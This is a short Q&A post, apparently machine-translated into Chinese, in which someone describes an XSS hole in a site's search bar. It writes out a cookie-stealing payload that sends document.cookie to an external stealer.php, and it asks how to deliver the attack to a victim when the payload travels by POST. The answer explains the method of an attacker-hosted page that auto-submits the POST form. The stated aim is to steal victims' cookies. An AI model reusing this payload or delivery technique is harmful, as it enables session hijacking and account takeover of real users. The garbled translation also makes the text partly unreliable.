我有一个问题,我在“搜索栏”上有xss vuln网站。在搜索栏上可以发生xss,我可以使用以下方法将我自己的cookie存储到我的其他网站: 你好新的Image()。src =“https:// site /stealer.php?cookie=”+ document.cookie;
不,如果url上没有有效负载(因为它使用post方法),我如何将http:// site(。)com / search这样的网址发送给我的受害者,并且在页面上不显示任何帖子可以导致XSS
或者如果有其他影响请解释给我
谢谢
答案 0 :(得分:0)
您向您的网站发送了一个网址,然后该网站会自动将所需的POST请求表单提交给相关网站。